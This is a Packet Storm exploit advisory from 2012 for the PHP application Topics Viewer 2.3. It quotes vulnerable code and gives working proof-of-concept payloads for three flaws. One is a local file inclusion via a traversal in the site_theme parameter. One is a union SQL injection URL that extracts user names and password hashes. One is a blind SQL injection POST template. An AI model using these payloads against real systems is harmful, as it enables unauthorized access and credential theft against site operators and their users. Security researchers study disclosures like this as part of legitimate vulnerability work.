what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Topics Viewer 2.3 Local File Inclusion / SQL Injection

Topics Viewer 2.3 Local File Inclusion / SQL Injection
Posted May 28, 2012
Authored by n4ss1m

Topics Viewer version 2.3 suffers from local file inclusion and remote SQL injection vulnerabilities.

tags | exploit, remote, local, vulnerability, sql injection, file inclusion
SHA-256 | 240295b4314ae057413639f66d3ca5596b799d870b2492f4e019413946b893f4

Topics Viewer 2.3 Local File Inclusion / SQL Injection

Change Mirror Download
################################################################################################
# Exploit Title: Topics viewer v 2.3 Multiple Vulnerabilities
# Software Link: http://nilehoster.com/default/topicsviewer

# Author: n4ss1m
# Date: 19-05-2012
# Tested on: win/linux
# Home : www.Sec4ever.com <http://www.sec4ever.com/>


################################################################################################

# Local File Inclusion ( footer.php )

<?php

// footer file //

echo "<br>";
@include ("themes/$site_theme/templates/footer_head.html"); # <--
$site_theme without value
echo "<br>";

...etc...
?>

# PoC :
http://domain.tld/footer.php?site_theme=../robots.txt%00



# Note : register_globals must be ON

################################################################################################

# SQL injection ( search.php )

<?
...
$q = strip_tags (trim(str_replace('"','',$_GET['q']))); # <----
variable $q equal $_GET['q']
...
if(isset ($q) && !empty ($q) && $q != " ")
{
$q = strip_tags(trim($_GET['q']));
$sql_s1 = "SELECT * FROM topics where t_title like '%$q%' OR t_desc
like '%$q%'"; # $q :)
$res_s1 = @mysql_query($sql_s1);
...
?>

# PoC :
http://domain.tld/search.php?q=junk'+union+select+1,group_concat(u_name,0x3a,u_mpass),3,4,5,6,7,8,9,10,11,12+from+users+where+u_id=1%23&search=true



# magic_quotes_gpc must be OFF

################################################################################################

# Blind SQL injection ( lost.php )

<?
....
if(!empty($_POST[uname]) && !empty($_POST[reg_mail]) &&
!empty($_POST[to_mail]) && strstr($_POST[to_mail],".") &&
strstr($_POST[to_mail],"@")
&& strstr($_POST[reg_mail],".") && strstr ($_POST[reg_mail],"@") ){
$s_pass = md5($_POST[s_pass]);
$sql_ver = "SELECT * FROM users where u_name = '$_POST[uname]' AND
u_email = '$_POST[reg_mail]'"; # <-- $_POST[uname] not secure we can
use it to inject mysql query
$res_ver = @mysql_query ($sql_ver);
$result_ver = @mysql_numrows($res_ver);
$user = @mysql_fetch_assoc($res_ver);
....
?>

# PoC :

POST : uname=junk'[SQL
injection]%23®_mail=email@email.tld&to_mail=email2@email.tld&B1=true
http://domain.tld/lost.php



# magic_quotes_gpc must be OFF

################################################################################################
# References : http://www.exploit4arab.com/exploits/69


# Vendor reported on : 19-05-2012
# published on : 27-05-2012
################################################################################################
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close